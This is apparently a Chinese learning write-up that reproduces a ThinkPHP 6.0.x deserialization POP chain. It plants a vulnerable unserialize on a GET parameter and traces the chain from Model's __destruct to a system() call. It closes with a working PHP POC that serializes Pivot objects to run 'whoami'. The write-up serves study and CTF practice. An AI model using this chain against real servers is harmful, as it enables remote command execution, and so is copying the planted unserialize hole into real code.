ThinkPHP V6.0反序列化漏洞复现

写在前面

跟着大佬一步一步复现的：ThinkPHP V6.0.x反序列化漏洞（自己的话emm(没事看看链子真的能让浮躁的心静下来…)）

环境搭建

安装好composer

composer create-project topthink/think=6.0.x-dev thinkphp-v6.0
cd thinkphp-v6.0
php think run

手动设置好利用点

<?php
namespace app\controller;
use app\BaseController;
class Index extends BaseController
{
    public function index()
    {
        $c = unserialize($_GET['CyanMoun']);   // 参数可控的unserialize函数
        var_dump($c);
        return 'Welcome to ThinkPHP!';
    }
}

__destruct

/vendor/topthink/think-orm/src/Model.php 中 Model 类的 __destruct 方法

$this->lazySave==true 时，可进入到save()方法，转到save方法的定义：

需要$this->isEmpty()为false，$this->trigger('BeforeWrite')为true

• $this->isEmpty() 方法：

  

  $this->data不为空

• $this->trigger() 方法（位于vendor\topthink\think-orm\src\model\concern\ModelEvent.php中）：

  

  $this->withEvent为false即可

将$this->exists为true即可进入 $this->updateData()，转到定义：

$this->getChangedData() 方法：

设置 $this-data 为非空，$this->force == true 即可，返回到刚才分析点，转到$this->checkAllowFields():

默认就可进入，然后来看$this->db()方法：

总结下设置点：

$this->data不为空
$this->lazySave == true
$this->withEvent == false
$this->exists == true
$this->force == true

注意：

Model 类是抽象类，不能实例化。所以要想利用，得找出 Model 类的一个子类进行实例化，这里可以用 Pivot 类（位于\vendor\topthink\think-orm\src\model\Pivot.php中）进行利用

__toString

利用点位于 vendor\topthink\think-orm\src\model\concern\Conversion.php 中名为Conversion 的trait(什么是trait)中：

跟进到$this->toArray()定义处：

对 $data进行遍历，其中 $key 为 $data 的键。默认情况下，会进入第二个 elseif 语句，从而将 $key 作为参数调用 getAttr() 方法。

我们接着跟进 getAttr() 方法（位于 vendor\topthink\think-orm\src\model\concern\Attribute.php 中）:

转到$this->getData()看看$value：

$name 值不为空，则将 $name值传入到getRealFieldName()方法，即toArray() 传进来的 $key。

继续跟进 getRealFieldName() 方法：(这里代码版本过高，懒了就做了点修改)：

$this->strict == true 时（默认为true），直接返回$name，也就是最开始从 toArray() 方法中传进来的 $key 值。所以getData()返回的就是$this->data[$key]，再来看getAttr()，最后的返回语句 getValue() 方法：（$value 的值就是 $this->data[$key]）

$closure 为 “system”，$this->data 为要执行的命令即可。

令 withAttr[$fieldName]="system"、$this->data="whoami" ，即执行 system('whoami');。

注意 $this->withAttr[$key] 存在且不为数组即可。

最后将table 声明为Pivot类的对象，从而将两个POP链串联起来。

POC

<?php
    
namespace think\model\concern;

trait Attribute
{
    private $data = ["evil_key" => "whoami"];
    private $withAttr = ["evil_key" => "system"];
}

namespace think;

abstract class Model
{
    use model\concern\Attribute;
    private $lazySave;
    protected $withEvent;
    private $exists;
    private $force;
    protected $table;
    function __construct($obj = '')
    {
        $this->lazySave = true;
        $this->withEvent = false;
        $this->exists = true;
        $this->force = true;
        $this->table = $obj;
    }
}

namespace think\model;

use think\Model;

class Pivot extends Model
{
}
$a = new Pivot();
$b = new Pivot($a);

echo urlencode(serialize($b));

（有些地方还有些疑问，估计得多了解下tp的使用和命名空间吧，希望借此以后能多学习学习）

CTF

[安洵杯 2019]iamthinking考的就是这个点，感兴趣可以拿来练练手